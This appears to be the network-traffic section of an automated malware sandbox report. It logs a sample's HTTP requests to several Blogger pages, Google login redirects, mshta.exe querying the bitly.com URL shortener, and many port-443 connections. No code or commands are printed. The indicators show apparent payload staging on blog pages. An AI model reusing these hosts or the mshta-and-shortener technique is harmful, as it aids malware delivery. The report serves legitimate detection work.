Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: backbones1234511a.blogspot.com
Source: global traffic HTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-4ddf-9917-2cf3a06acb70 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://backbones1234511a.blogspot.com/p/ayoolaback.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /p/backbone16.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: startthepartyup.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-4fb6-885f-019691b40909 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoolaback.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: ghostbackbone123.blogspot.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://startthepartyup.blogspot.com/p/backbone16.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-4693-89a0-5b335e695da7 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%2522&type=blog HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871
Source: global traffic HTTP traffic detected: GET /ServiceLogin?continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15.html%252522%26type%3Dblog%26bpli%3D1&passive=true&go=true HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: accounts.google.com
Source: global traffic HTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://ghostbackbone123.blogspot.com/p/ghostbackup15.html%22Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: _ga=GA1.2.1019477682.1631745871; _gid=GA1.2.1988527763.1631745871Connection: Keep-AliveHost: www.blogger.com
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbone16.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /css/maia.css HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google.comIf-Modified-Since: Mon, 25 May 2020 08:30:00 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /analytics.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghostbackup15.html%2522&type=blog&bpli=1Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.google-analytics.comIf-Modified-Since: Wed, 11 Aug 2021 00:32:57 GMTConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ayoolaback.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: backbones1234511a.blogspot.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p/ghostbackup15.html%22 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ghostbackbone123.blogspot.comConnection: Keep-Alive
Connects to a URL shortener service
Source: C:\Windows\System32\mshta.exe DNS query: name: bitly.com
Source: unknown Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49225
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49224
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49223
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49222
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49221
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49220
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown Network traffic detected: HTTP traffic on port 49204 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown Network traffic detected: HTTP traffic on port 49207 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49199 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49219
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49218
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49217
Source: unknown Network traffic detected: HTTP traffic on port 49233 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49216
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49215
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49214
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49213
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49212
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49210
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49224 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49213 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49238 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49209
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49208
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49207
Source: unknown Network traffic detected: HTTP traffic on port 49230 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49206
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49205
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49204
Source: unknown Network traffic detected: HTTP traffic on port 49219 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49225 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49231 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49216 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49222 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49205 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49208 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49236 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49179 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49223 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49195 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49237 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49214 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49220 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49190 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49228 -> 443
